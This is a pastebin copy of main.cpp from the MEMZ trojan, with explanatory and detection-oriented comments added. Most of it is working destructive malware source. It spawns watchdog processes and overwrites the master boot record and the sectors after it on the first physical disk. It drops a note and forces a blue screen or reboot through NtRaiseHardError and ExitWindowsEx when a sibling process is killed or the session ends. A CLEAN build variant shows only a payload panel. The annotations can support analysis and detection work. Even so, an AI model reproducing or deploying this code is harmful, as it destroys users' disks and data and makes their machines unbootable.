FlyFar

main.cpp

Mar 21st, 2023
  1. #include "memz.h"
  2.  
  3. int scrw, scrh; // Primary-screen width and height in pixels; filled in by main() via GetSystemMetrics
  4.  
  5. #ifdef CLEAN
  6. HWND mainWindow; // Payload-panel top-level window, created in main(). (In the main window, in the main window, ...)
  7. HFONT font; // GUI font built in main() from the DEFAULT_GUI_FONT LOGFONT
  8. HWND dialog; // Set to the active window on WM_ACTIVATE (or NULL); main()'s loop hands it to IsDialogMessage
  9. #endif
  10.  
  11. void main() {
      /*
       * Entry point shared by both build flavours.
       *
       * Built without CLEAN (destructive build), the role of the instance is
       * chosen by argv[1]:
       *   - "/watchdog": start watchdogThread, create a window whose
       *     WindowProc reacts to WM_CLOSE / WM_ENDSESSION, and pump messages.
       *   - no argument: show two consent prompts, then relaunch this image
       *     five times with "/watchdog" and once with "/main", and exit(0).
       *   - any other argument (the launcher uses "/main"): fall through to
       *     the code that overwrites the first 64 KiB of \\.\PhysicalDrive0,
       *     writes \note.txt, opens it in Notepad and starts the payload
       *     threads.
       *
       * Built with CLEAN, no disk write happens; the function builds the
       * "Payload Panel" window with one toggle button per payload.
       *
       * Analysis / detection notes (destructive build):
       *   - Process tree: one parent spawning six children of its own image,
       *     five with the command line "/watchdog" and one with "/main".
       *   - A write-capable handle on \\.\PhysicalDrive0 from a user-launched
       *     process. Raw disk write access normally requires elevation; when
       *     the open fails this process exits with code 2.
       *   - Exit codes 2..5 identify which step failed (disk open, disk write,
       *     note create, note write).
       *   - Creation of \note.txt in the root of the current drive followed
       *     by a notepad launch on that path.
       */
  12.     scrw = GetSystemMetrics(SM_CXSCREEN);
  13.     scrh = GetSystemMetrics(SM_CYSCREEN);
  14.  
  15. #ifndef CLEAN
          // Split the process command line; argv[1] selects the role of this instance.
  16.     int argc;
  17.     LPWSTR *argv = CommandLineToArgvW(GetCommandLineW(), &argc);
  18.  
  19.     if (argc > 1) {
  20.         if (!lstrcmpW(argv[1], L"/watchdog")) {
                  // Watchdog role: a background thread polls the process list (see watchdogThread).
  21.             CreateThread(NULL, NULL, &watchdogThread, NULL, NULL, NULL);
  22.  
                  // Register a window class so this instance owns a window; its WindowProc
                  // (non-CLEAN variant below) calls killWindows() on WM_CLOSE / WM_ENDSESSION.
  23.             WNDCLASSEXA c;
  24.             c.cbSize = sizeof(WNDCLASSEXA);
  25.             c.lpfnWndProc = WindowProc;
  26.             c.lpszClassName = "hax";
  27.             c.style = 0;
  28.             c.cbClsExtra = 0;
  29.             c.cbWndExtra = 0;
  30.             c.hInstance = NULL;
  31.             c.hIcon = 0;
  32.             c.hCursor = 0;
  33.             c.hbrBackground = 0;
  34.             c.lpszMenuName = NULL;
  35.             c.hIconSm = 0;
  36.  
  37.             RegisterClassExA(&c);
  38.  
                  // Window style is NULL (no WS_VISIBLE), so the window is never shown.
  39.             HWND hwnd = CreateWindowExA(0, "hax", NULL, NULL, 0, 0, 100, 100, NULL, NULL, NULL, NULL);
  40.  
                  // Standard message pump; keeps the watchdog instance alive.
  41.             MSG msg;
  42.             while (GetMessage(&msg, NULL, 0, 0) > 0) {
  43.                 TranslateMessage(&msg);
  44.                 DispatchMessage(&msg);
  45.             }
  46.         }
  47.     } else {
  48.         // Another very ugly formatting
              // Launcher role: two consent prompts. Any answer other than Yes on
              // either box ends the process with exit code 0 and nothing else runs.
  49.         if (MessageBoxA(NULL, "The software you just executed is considered malware.\r\n\
  50. This malware will harm your computer and makes it unusable.\r\n\
  51. If you are seeing this message without knowing what you just executed, simply press No and nothing will happen.\r\n\
  52. If you know what this malware does and are using a safe environment to test, \
  53. press Yes to start it.\r\n\r\n\
  54. DO YOU WANT TO EXECUTE THIS MALWARE, RESULTING IN AN UNUSABLE MACHINE?", "MEMZ", MB_YESNO | MB_ICONWARNING) != IDYES ||
  55. MessageBoxA(NULL, "THIS IS THE LAST WARNING!\r\n\r\n\
  56. THE CREATOR IS NOT RESPONSIBLE FOR ANY DAMAGE MADE USING THIS MALWARE!\r\n\
  57. STILL EXECUTE IT?", "MEMZ", MB_YESNO | MB_ICONWARNING) != IDYES) {
  58.             ExitProcess(0);
  59.         }
  60.  
              // Zero-filled buffer (8192 wide chars) that receives this executable's own path.
  61.         wchar_t *fn = (wchar_t *)LocalAlloc(LMEM_ZEROINIT, 8192*2);
  62.         GetModuleFileName(NULL, fn, 8192);
  63.  
              // Five copies of this image are started in the watchdog role.
  64.         for (int i = 0; i < 5; i++)
  65.             ShellExecute(NULL, NULL, fn, L"/watchdog", NULL, SW_SHOWDEFAULT);
  66.  
              // One more copy is started with "/main"; that instance takes the
              // fall-through path below. SEE_MASK_NOCLOSEPROCESS asks for the child's
              // process handle so its priority can be raised afterwards.
  67.         SHELLEXECUTEINFO info;
  68.         info.cbSize = sizeof(SHELLEXECUTEINFO);
  69.         info.lpFile = fn;
  70.         info.lpParameters = L"/main";
  71.         info.fMask = SEE_MASK_NOCLOSEPROCESS;
  72.         info.hwnd = NULL;
  73.         info.lpVerb = NULL;
  74.         info.lpDirectory = NULL;
  75.         info.hInstApp = NULL;
  76.         info.nShow = SW_SHOWDEFAULT;
  77.  
  78.         ShellExecuteEx(&info);
  79.  
  80.         SetPriorityClass(info.hProcess, HIGH_PRIORITY_CLASS);
  81.  
              // The launcher itself exits; only the six children remain.
  82.         ExitProcess(0);
  83.     }
  84.  
          // Destructive step: raw read/write handle on the first physical disk.
          // This open is the highest-signal event in the file for endpoint
          // monitoring; failure (e.g. no elevation) ends the process with code 2.
  85.     HANDLE drive = CreateFileA("\\\\.\\PhysicalDrive0", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
  86.  
  87.     if (drive == INVALID_HANDLE_VALUE)
  88.         ExitProcess(2);
  89.  
          // 64 KiB zero-filled staging buffer for the replacement boot data.
  90.     unsigned char *bootcode = (unsigned char *)LocalAlloc(LMEM_ZEROINIT, 65536);
  91.  
  92.     // Join the two code parts together
          // code1 goes to offset 0 and code2 to offset 0x1fe (byte 510, where the
          // two-byte boot signature of a 512-byte sector sits). code1/code2 and
          // their lengths are defined outside this file (presumably via memz.h).
  93.     int i = 0;
  94.     for (; i < code1_len; i++)
  95.         *(bootcode + i) = *(code1 + i);
  96.     for (i = 0; i < code2_len; i++)
  97.         *(bootcode + i + 0x1fe) = *(code2 + i);
  98.  
          // The handle's file position is never moved, so the write starts at
          // byte 0 of the disk: the MBR and the sectors after it (65536 bytes in
          // total) are replaced. A failed write ends the process with code 3.
  99.     DWORD wb;
  100.     if (!WriteFile(drive, bootcode, 65536, &wb, NULL))
  101.         ExitProcess(3);
  102.  
  103.     CloseHandle(drive);
  104.  
           // Drop a text note at the root of the current drive. `msg`/`msg_len`
           // here are globals defined elsewhere, not the MSG local used above.
  105.     HANDLE note = CreateFileA("\\note.txt", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
  106.  
  107.     if (note == INVALID_HANDLE_VALUE)
  108.         ExitProcess(4);
  109.  
  110.     if (!WriteFile(note, msg, msg_len, &wb, NULL))
  111.         ExitProcess(5);
  112.  
  113.     CloseHandle(note);
           // Open the note in Notepad so it is shown to the user.
  114.     ShellExecuteA(NULL, NULL, "notepad", "\\note.txt", NULL, SW_SHOWDEFAULT);
  115.  
           // One thread per entry of the payloads table, each started after
           // sleeping for that entry's configured delay. The table and
           // payloadThread are defined outside this file.
  116.     for (int p = 0; p < nPayloads; p++) {
  117.         Sleep(payloads[p].delay);
  118.         CreateThread(NULL, NULL, &payloadThread, &payloads[p], NULL, NULL);
  119.     }
  120.  
           // Park the main thread so the process (and its payload threads) stays alive.
  121.     for (;;) {
  122.         Sleep(10000);
  123.     }
  124.  
  125. #else // CLEAN
           // CLEAN build: no disk access; build the payload control panel instead.
  126.     InitCommonControls();
  127.  
  128.     dialog = NULL;
  129.  
           // Recreate the stock GUI font as an HFONT that can be assigned to the controls.
  130.     LOGFONT lf;
  131.     GetObject(GetStockObject(DEFAULT_GUI_FONT), sizeof(LOGFONT), &lf);
  132.     font = CreateFont(lf.lfHeight, lf.lfWidth,
  133.         lf.lfEscapement, lf.lfOrientation, lf.lfWeight,
  134.         lf.lfItalic, lf.lfUnderline, lf.lfStrikeOut, lf.lfCharSet,
  135.         lf.lfOutPrecision, lf.lfClipPrecision, lf.lfQuality,
  136.         lf.lfPitchAndFamily, lf.lfFaceName);
  137.  
           // Window class for the panel; WindowProc here is the CLEAN variant.
  138.     WNDCLASSEX c;
  139.     c.cbSize = sizeof(WNDCLASSEX);
  140.     c.lpfnWndProc = WindowProc;
  141.     c.lpszClassName = L"MEMZPanel";
  142.     c.style = CS_HREDRAW | CS_VREDRAW;
  143.     c.cbClsExtra = 0;
  144.     c.cbWndExtra = 0;
  145.     c.hInstance = NULL;
  146.     c.hIcon = 0;
  147.     c.hCursor = 0;
  148.     c.hbrBackground = (HBRUSH)(COLOR_3DFACE+1);
  149.     c.lpszMenuName = NULL;
  150.     c.hIconSm = 0;
  151.  
  152.     RegisterClassEx(&c);
  153.  
           // Compute the outer window size that yields a WINDOWWIDTH x WINDOWHEIGHT client area.
  154.     RECT rect;
  155.     rect.left = 0;
  156.     rect.right = WINDOWWIDTH;
  157.     rect.top = 0;
  158.     rect.bottom = WINDOWHEIGHT;
  159.  
  160.     AdjustWindowRect(&rect, WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_MINIMIZEBOX, FALSE);
  161.  
  162.     mainWindow = CreateWindowEx(0, L"MEMZPanel", L"MEMZ Clean Version - Payload Panel", WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_MINIMIZEBOX,
  163.         50, 50, rect.right-rect.left, rect.bottom-rect.top, NULL, NULL, GetModuleHandle(NULL), NULL);
  164.  
           // One push-like checkbox per payload, laid out on a COLUMNS-wide grid,
           // plus one payloadThread per entry. The checkbox state is read back
           // with BM_GETCHECK in WindowProc and keyboardThread.
  165.     for (int p = 0; p < nPayloads; p++) {
  166.         payloads[p].btn = CreateWindowW(L"BUTTON", payloads[p].name, (p==0?WS_GROUP:0) | WS_VISIBLE | WS_CHILD | WS_TABSTOP | BS_PUSHLIKE | BS_AUTOCHECKBOX | BS_NOTIFY,
  167.             (p%COLUMNS)*BTNWIDTH+SPACE*(p%COLUMNS+1), (p/COLUMNS)*BTNHEIGHT + SPACE*(p/COLUMNS+1), BTNWIDTH, BTNHEIGHT,
  168.             mainWindow, NULL, (HINSTANCE)GetWindowLong(mainWindow, GWL_HINSTANCE), NULL);
  169.         SendMessage(payloads[p].btn, WM_SETFONT, (WPARAM)font, TRUE);
  170.  
  171.         CreateThread(NULL, NULL, &payloadThread, &payloads[p], NULL, NULL);
  172.     }
  173.  
  174.     SendMessage(mainWindow, WM_SETFONT, (WPARAM)font, TRUE);
  175.  
  176.     ShowWindow(mainWindow, SW_SHOW);
  177.     UpdateWindow(mainWindow);
  178.    
           // Hotkey polling (SHIFT+ESC, CTRL+SHIFT+S) runs on its own thread.
  179.     CreateThread(NULL, NULL, &keyboardThread, NULL, NULL, NULL);
  180.  
           // Message pump; IsDialogMessage gives the active window dialog-style
           // keyboard navigation (e.g. TAB between the payload buttons).
  181.     MSG msg;
  182.     while (GetMessage(&msg, NULL, 0, 0) > 0) {
  183.         if (dialog == NULL || !IsDialogMessage(dialog, &msg)) {
  184.             TranslateMessage(&msg);
  185.             DispatchMessage(&msg);
  186.         }
  187.     }
  188. #endif
  189. }
  190.  
  191. #ifndef CLEAN
  192. LRESULT CALLBACK WindowProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
           /*
            * Window procedure of the "hax" window owned by each watchdog instance
            * (destructive build). A request to close the window or to end the
            * session (logoff / shutdown) calls killWindows(), which ends in a forced
            * crash or reboot; every other message goes to DefWindowProc.
            *
            * Incident-handling note: on a live host running these instances, an
            * orderly logoff or shutdown is itself one of the triggers.
            */
  193.     if (msg == WM_CLOSE || msg == WM_ENDSESSION) {
  194.         killWindows();
  195.         return 0;
  196.     }
  197.  
  198.     return DefWindowProc(hwnd, msg, wParam, lParam);
  199. }
  200.  
  201. DWORD WINAPI watchdogThread(LPVOID parameter) {
           /*
            * Self-protection loop of a watchdog instance. Roughly every 10 ms it
            * counts the running processes whose image path equals this process's
            * own image path; if the count is lower than in the previous sample
            * (i.e. a sibling instance went away) it calls killWindows().
            * `parameter` is unused. The loop never exits, so nothing is returned.
            *
            * Detection note: the loop takes a Toolhelp process snapshot and calls
            * OpenProcess(PROCESS_QUERY_INFORMATION) on every PID about a hundred
            * times per second, which stands out in process-access telemetry.
            */
  202.     int oproc = 0; // instance count seen in the previous iteration
  203.  
           // Own image path as returned by GetProcessImageFileNameA (device-form path).
  204.     char *fn = (char *)LocalAlloc(LMEM_ZEROINIT, 512);
  205.     GetProcessImageFileNameA(GetCurrentProcess(), fn, 512);
  206.  
           // Initial one-second pause before the first sample.
  207.     Sleep(1000);
  208.  
  209.     for (;;) {
  210.         HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
  211.         PROCESSENTRY32 proc;
  212.         proc.dwSize = sizeof(proc);
  213.  
  214.         Process32First(snapshot, &proc);
  215.  
  216.         int nproc = 0; // instance count for this iteration
  217.         do {
                   // Resolve each process's image path and compare it with our own.
  218.             HANDLE hProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, proc.th32ProcessID);
  219.             char *fn2 = (char *)LocalAlloc(LMEM_ZEROINIT, 512);
  220.             GetProcessImageFileNameA(hProc, fn2, 512);
  221.  
  222.             if (!lstrcmpA(fn, fn2)) {
  223.                 nproc++;
  224.             }
  225.  
  226.             CloseHandle(hProc);
  227.             LocalFree(fn2);
  228.         } while (Process32Next(snapshot, &proc));
  229.  
  230.         CloseHandle(snapshot);
  231.  
               // Fewer instances than last time: treat it as tampering.
  232.         if (nproc < oproc) {
  233.             killWindows();
  234.         }
  235.  
  236.         oproc = nproc;
  237.  
  238.         Sleep(10);
  239.     }
  240. }
  241.  
  242. void killWindows() {
           /*
            * Tamper response used by the watchdog: starts 20 threads running
            * ripMessageThread (one every 100 ms, so about two seconds in total),
            * each of which shows a message box, then calls killWindowsInstant()
            * to crash or reboot the machine.
            */
  243.     // Show cool MessageBoxes
  244.     for (int i = 0; i < 20; i++) {
  245.         CreateThread(NULL, 4096, &ripMessageThread, NULL, NULL, NULL);
  246.         Sleep(100);
  247.     }
  248.  
  249.     killWindowsInstant();
  250. }
  251.  
  252. void killWindowsInstant() {
           /*
            * Brings the system down in two stages:
            *   1. Resolve RtlAdjustPrivilege and NtRaiseHardError from ntdll at
            *      run time and call them to raise a fatal hard error.
            *   2. If execution continues, enable SE_SHUTDOWN_NAME on the process
            *      token and call ExitWindowsEx for a forced reboot.
            *
            * Detection notes: neither ntdll export appears in the import table
            * because both are looked up with GetProcAddress, so static import
            * scanning misses them; the strings "RtlAdjustPrivilege" and
            * "NtRaiseHardError" remain visible in the binary unless packed, and
            * a user-mode application resolving NtRaiseHardError is unusual.
            */
  253.     // Try to force BSOD first
  254.     // I like how this method even works in user mode without admin privileges on all Windows versions since XP (or 2000, idk)...
  255.     // This isn't even an exploit, it's just an undocumented feature.
  256.     HMODULE ntdll = LoadLibraryA("ntdll");
  257.     FARPROC RtlAdjustPrivilege = GetProcAddress(ntdll, "RtlAdjustPrivilege");
  258.     FARPROC NtRaiseHardError = GetProcAddress(ntdll, "NtRaiseHardError");
  259.  
  260.     if (RtlAdjustPrivilege != NULL && NtRaiseHardError != NULL) {
  261.         BOOLEAN tmp1; DWORD tmp2;
               // Privilege 19 is SeShutdownPrivilege; 0xc0000022 is STATUS_ACCESS_DENIED
               // and response option 6 is the "shutdown system" option of the hard-error API.
  262.         ((void(*)(DWORD, DWORD, BOOLEAN, LPBYTE))RtlAdjustPrivilege)(19, 1, 0, &tmp1);
  263.         ((void(*)(DWORD, DWORD, DWORD, DWORD, DWORD, LPDWORD))NtRaiseHardError)(0xc0000022, 0, 0, 0, 6, &tmp2);
  264.     }
  265.  
  266.     // If the computer is still running, do it the normal way
  267.     HANDLE token;
  268.     TOKEN_PRIVILEGES privileges;
  269.  
  270.     OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &token);
  271.  
           // Enable the shutdown privilege on this process's token through the documented API.
  272.     LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &privileges.Privileges[0].Luid);
  273.     privileges.PrivilegeCount = 1;
  274.     privileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
  275.  
  276.     AdjustTokenPrivileges(token, FALSE, &privileges, 0, (PTOKEN_PRIVILEGES)NULL, 0);
  277.  
  278.     // The actual restart
           // EWX_FORCE closes applications without letting them prompt to save; the
           // reason code logged for the shutdown claims a hardware/disk cause.
  279.     ExitWindowsEx(EWX_REBOOT | EWX_FORCE, SHTDN_REASON_MAJOR_HARDWARE | SHTDN_REASON_MINOR_DISK);
  280. }
  281.  
  282. DWORD WINAPI ripMessageThread(LPVOID parameter) {
           /*
            * Thread body started by killWindows(): shows one system-modal "MEMZ"
            * message box whose text is picked at random from the msgs table, with
            * a thread-local WH_CBT hook (msgBoxHook) installed for the lifetime of
            * the box. msgs, nMsgs, random() and msgBoxHook are defined outside this
            * file, so what the hook does to the box is not visible here.
            * `parameter` is unused. Always returns 0.
            */
  283.     HHOOK hook = SetWindowsHookEx(WH_CBT, msgBoxHook, 0, GetCurrentThreadId());
  284.     MessageBoxA(NULL, (LPCSTR)msgs[random() % nMsgs], "MEMZ", MB_OK | MB_SYSTEMMODAL | MB_ICONHAND);
  285.     UnhookWindowsHookEx(hook);
  286.  
  287.     return 0;
  288. }
  289. #else // CLEAN
  290. LRESULT CALLBACK WindowProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
           /*
            * Window procedure of the CLEAN build's payload panel.
            *   WM_ACTIVATE - records the active window in `dialog` (NULL when
            *                 wParam is zero) for the IsDialogMessage call in main().
            *   WM_DESTROY  - ends the process.
            *   WM_COMMAND  - when a payload button not flagged `safe` has just been
            *                 checked, unchecks it and re-checks it only if the user
            *                 confirms the warning prompt.
            *   WM_PAINT    - draws the two status/help lines at the bottom.
            * Other messages go to DefWindowProc; handled messages return 0.
            */
  291.     PAINTSTRUCT ps;
  292.     HDC hdc;
  293.    
  294.     if (msg == WM_ACTIVATE) {
  295.         if (wParam == NULL)
  296.             dialog = NULL;
  297.         else
  298.             dialog = hwnd;
  299.     } else if (msg == WM_DESTROY) {
  300.         ExitProcess(0);
  301.     } else if (msg == WM_COMMAND) {
               // lParam carries the button's window handle; act only if it is now checked.
  302.         if (wParam == BN_CLICKED && SendMessage((HWND)lParam, BM_GETCHECK, 0, NULL) == BST_CHECKED) {
  303.             for (int p = 0; p < nPayloads; p++) {
  304.                 if (payloads[p].btn == (HWND)lParam && !payloads[p].safe) {
                           // Revert the check first so the payload stays off while the prompt is open.
  305.                     SendMessage((HWND)lParam, BM_SETCHECK, BST_UNCHECKED, NULL);
  306.                     // Most ugly formatting EVER
  307.                     if (MessageBoxA(hwnd,
  308.                         "This payload is considered semi-harmful.\r\nThis means, it should be safe to use, but can still cause data loss or other things you might not want.\r\n\r\n\
  309. If you have productive data on your system or signed in to online accounts, it is recommended to run this payload inside a \
  310. virtual machine in order to prevent potential data loss or changed things you might not want.\r\n\r\n\
  311. Do you still want to enable it?",
  312. "MEMZ", MB_YESNO | MB_ICONWARNING) == IDYES) {
  313.                         SendMessage((HWND)lParam, BM_SETCHECK, BST_CHECKED, NULL);
  314.                     }
  315.                 }
  316.             }
  317.         }
  318.     } else if (msg == WM_PAINT) {
  319.         hdc = BeginPaint(hwnd, &ps);
  320.         SelectObject(hdc, font);
  321.         LPWSTR str;
  322.         LPWSTR state = enablePayloads ? L"ENABLED" : L"DISABLED";
               // FORMAT_MESSAGE_ALLOCATE_BUFFER makes FormatMessage allocate `str`;
               // %1 is replaced with `state`.
               // NOTE(review): no LocalFree(str) is visible in this block, so each
               // repaint appears to leak the formatted string.
  323.         FormatMessage(FORMAT_MESSAGE_FROM_STRING | FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_ARGUMENT_ARRAY,
  324.             L"Payloads are currently %1. Press SHIFT+ESC to toggle all payloads!", 0, 0, (LPWSTR)&str, 1024, (va_list*)&state);
  325.  
  326.         TextOut(hdc, 10, WINDOWHEIGHT - 36, str, lstrlen(str));
               // 65 is the character count of the literal below.
  327.         TextOut(hdc, 10, WINDOWHEIGHT - 20, L"Press CTRL+SHIFT+S to skip some time (makes some payloads faster)", 65);
  328.  
  329.         EndPaint(hwnd, &ps);
  330.     } else {
  331.         return DefWindowProc(hwnd, msg, wParam, lParam);
  332.     }
  333.  
  334.     return 0;
  335. }
  336.  
  337. DWORD WINAPI keyboardThread(LPVOID lParam) {
           /*
            * Hotkey poller of the CLEAN build; checks key state about every 10 ms.
            *   SHIFT+ESC    - toggles the global enablePayloads flag. When payloads
            *                  are switched off, the whole screen is invalidated and
            *                  this process's other windows are closed through
            *                  CleanWindowsProc; when switched on, only the panel is
            *                  repainted. The thread then waits for the keys to be
            *                  released so one press toggles once.
            *   CTRL+SHIFT+S - while payloads are enabled, calls the payloadFunction
            *                  of every checked payload immediately and stores its
            *                  return value as that payload's next delay.
            * `lParam` is unused. The loop never exits; the trailing return is
            * unreachable.
            */
  338.     for (;;) {
               // Bit 0x8000 of GetKeyState is set while a key is down; AND-ing the
               // states requires every key of the combination to be held.
  339.         if ((GetKeyState(VK_SHIFT) & GetKeyState(VK_ESCAPE)) & 0x8000) {
  340.             enablePayloads = !enablePayloads;
  341.  
  342.             if (!enablePayloads) {
                       // NOTE(review): rect/desktop are filled in but not used afterwards in this block.
  343.                 RECT rect;
  344.                 HWND desktop = GetDesktopWindow();
  345.                 GetWindowRect(desktop, &rect);
  346.  
                       // Repaint everything to wipe what the payloads drew on screen.
  347.                 RedrawWindow(NULL, NULL, NULL, RDW_ERASE | RDW_INVALIDATE | RDW_ALLCHILDREN);
  348.  
  349.                 EnumWindows(&CleanWindowsProc, NULL);
  350.             } else {
  351.                 RedrawWindow(mainWindow, NULL, NULL, RDW_INVALIDATE | RDW_ERASE);
  352.             }
  353.  
                   // Wait for key release (debounce).
  354.             while ((GetKeyState(VK_SHIFT) & GetKeyState(VK_ESCAPE)) & 0x8000) {
  355.                 Sleep(100);
  356.             }
  357.         } else if ((GetKeyState(VK_SHIFT) & GetKeyState(VK_CONTROL) & GetKeyState('S')) & 0x8000) {
  358.             if (enablePayloads) {
  359.                 for (int p = 0; p < nPayloads; p++) {
  360.                     if (SendMessage(payloads[p].btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) {
                               // Advance this payload's counters by one step without sleeping.
  361.                         payloads[p].delay = payloads[p].payloadFunction(payloads[p].times++, payloads[p].runtime += payloads[p].delay, TRUE);
  362.                     }
  363.                 }
  364.             }
  365.         }
  366.  
  367.         Sleep(10);
  368.     }
  369.  
  370.     return 0;
  371. }
  372.  
  373. BOOL CALLBACK CleanWindowsProc(HWND hwnd, LPARAM lParam) {
           /*
            * EnumWindows callback used by keyboardThread when payloads are switched
            * off: sends WM_CLOSE to every enumerated window that belongs to this
            * process, except the panel itself. Windows of other processes are left
            * alone. `lParam` is unused. Always returns TRUE so enumeration continues.
            */
  374.     DWORD pid;
  375.     if (GetWindowThreadProcessId(hwnd, &pid) && pid == GetCurrentProcessId() && hwnd != mainWindow) {
  376.         SendMessage(hwnd, WM_CLOSE, 0, 0);
  377.     }
  378.     return TRUE;
  379. }
  380. #endif
  381.  
  382.  